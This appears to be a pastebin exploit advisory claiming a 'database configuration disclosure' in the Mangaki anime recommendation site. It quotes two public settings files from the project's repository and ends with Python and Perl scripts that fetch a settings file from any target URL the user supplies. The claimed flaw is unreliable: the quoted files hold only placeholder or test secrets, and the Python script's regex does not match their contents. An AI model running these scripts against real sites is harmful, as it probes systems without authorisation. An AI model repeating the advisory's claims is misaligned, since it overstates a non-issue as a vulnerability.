TqH3DeMx

· 6 years ago · Jun 10, 2019, 02:10 PM
1###########################################################################
2
3# Exploit Title : Mangaki 0.6.1 Database Configuration Disclosure
4# Author [ Discovered By ] : KingSkrupellos
5# Team : Cyberizm Digital Security Army
6# Date : 09/06/2019
7# Vendor Homepage : mangaki.fr
8# Software Download Link : github.com/mangaki/mangaki/archive/master.zip
9# Software Version : 0.6.1 and lower versions
10# Tested On : Windows and Linux
11# Category : WebApps
12# Exploit Risk : Medium
13# Vulnerability Type : 
14CWE-16   [ Configuration ]
15CWE-200 [ Information Exposure ]
16CWE-538 [ File and Directory Information Exposure ]
17# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
18# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
19# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
20# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
21acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
22# Acunetix Reference Link About : [ Possible Database Backup File ]
23acunetix.com/vulnerabilities/web/possible-database-backup/
24# Source : cxsecurity.com/issue/WLB-2019060051
25
26###########################################################################
27
28# Information about Software :
29****************************
30Mangaki is an anime & manga recommendation website.
31
32###########################################################################
33
34# Impact :
35***********
36* The product stores sensitive information in files or directories that are accessible 
37to actors outside of the intended control sphere.
38* An information exposure is the intentional or unintentional disclosure of information 
39to an actor that is not explicitly authorized to have access to that information.
40* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 
41MySQL over the World Wide Web. It can be used to dump a database or a collection of 
42databases for backup or transfer to another SQL server (not necessarily a MySQL server). 
43The dump typically contains SQL statements to create the table, populate it, or both. 
44This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 
45should not be found on a production system.
46* It looks like this file contains a database backup/dump. 
47Acunetix inferred this filename from the domain name. A database backup contains a record of the
48 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 
49A database backup is most often used for backing up a database so that its contents can be restored 
50in the event of data loss. This information is highly sensitive and should never be found on a production system.
51Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 
52to the web server. As a workaround, you could restrict access to this file.
53
54###########################################################################
55
56File :
57******
58/mangaki/settings.template.ini
59
60/mangaki/mangaki/settings.template.ini
61
62Information :
63*************
64[debug]
65  DEBUG = True
66  # Debug JavaScript frontend
67  DEBUG_VUE_JS = True
68
69[email]
70  EMAIL_BACKEND = django.core.mail.backends.console.EmailBackend
71
72[secrets]
73# Choose your own password or generate it with `pwgen -s -c 60 1`
74  SECRET_KEY = CHANGE_ME
75  DB_PASSWORD = YOUR_POSTGRE_PASSWORD
76
77#[deployment]
78#  MEDIA_ROOT = <base directory for media files>
79#  STATIC_ROOT = <base directory for static files>
80#  DATA_ROOT = <base directory for data files: snapshots of algorithms, side information>
81
82#[hosts]
83#  ALLOWED_HOSTS = <see https://docs.djangoproject.com/fr/1.10/ref/settings/#allowed-hosts> 
84
85#[mal] # Used to get posters and user lists
86#  MAL_USER = 
87#  MAL_USER_AGENT = 
88
89#[anidb]
90#  ANIDB_CLIENT = 
91#  ANIDB_VERSION = 1
92
93#[pgsql]
94#  DB_HOST = <defaults to 127.0.0.1>
95#  DB_NAME = <defaults to mangaki>
96#  DB_USER = <defaults to django>
97
98#[sentry] (not required, only if you want to enable Sentry support)
99#  DSN = <sentry DSN>
100
101#[secrets]
102#  MAL_PASS = 
103
104#[smtp]
105#  EMAIL_HOST = 
106#  EMAIL_HOST_PASSWORD = 
107#  EMAIL_HOST_USER = 
108#  EMAIL_PORT = 
109#  EMAIL_SSL_CERTFILE = 
110#  EMAIL_SSL_KEYFILE = 
111#  EMAIL_TIMEOUT = 
112#  EMAIL_USE_SSL = 
113#  EMAIL_USE_TLS = 
114
115raw.githubusercontent.com/mangaki/mangaki/master/mangaki/settings.template.ini
116
117File :
118*******
119/.circle_mangaki_settings.ini
120
121Information :
122*************
123[debug]
124DEBUG = True
125
126[secrets]
127SECRET_KEY = test
128DB_PASSWORD = ""
129
130[pgsql]
131DB_NAME = circle_test
132DB_USER = mangaki
133
134[email]
135EMAIL_BACKEND = django.core.mail.backends.dummy.EmailBackend
136
137raw.githubusercontent.com/mangaki/mangaki/master/.circle_mangaki_settings.ini
138
139###########################################################################
140
141# Database Disclosure Information Exposure Exploit 1 :
142***********************************************
143#!/usr/bin/python
144import string
145import re
146from urllib2 import Request, urlopen
147disc = "/mangaki/settings.template.ini"
148url = raw_input ("URL: ")
149req = Request(url+disc)
150rta = urlopen(req)
151print "Result"
152html = rta.read()
153rdo = str(re.findall("resources.*=*", html))
154print rdo
155exit
156
157###########################################################################
158
159# Database Disclosure Information Exposure Exploit 2 :
160***********************************************
161#!/usr/bin/perl -w
162# Author : KingSkrupellos
163# Team : Cyberizm Digital Security Army
164
165use LWP::Simple;
166use LWP::UserAgent;
167
168system('cls');
169system('Mangaki 0.6.1 Database Configuration Disclosure');
170system('color a');
171
172
173if(@ARGV < 2)
174{
175print "[-]How To Use\n\n";
176&help; exit();
177}
178sub help()
179{
180print "[+] usage1 : perl $0 site.com /path/ \n";
181print "[+] usage2 : perl $0 localhost / \n";
182}
183($TargetIP, $path, $File,) = @ARGV;
184
185$File="mangaki/settings.template.ini";
186my $url = "http://" . $TargetIP . $path . $File;
187print "\n Wait Please Dear Hacker!!! \n\n";
188
189my $useragent = LWP::UserAgent->new();
190my $request = $useragent->get($url,":content_file" => "D:/mangaki/settings.template.ini");
191
192if ($request->is_success)
193{
194print "[+] $url Exploited!\n\n";
195print "[+] Database saved to D:/mangaki/settings.template.ini\n";
196exit();
197}
198else
199{
200print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
201exit();
202}
203
204###########################################################################
205
206# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 
207
208###########################################################################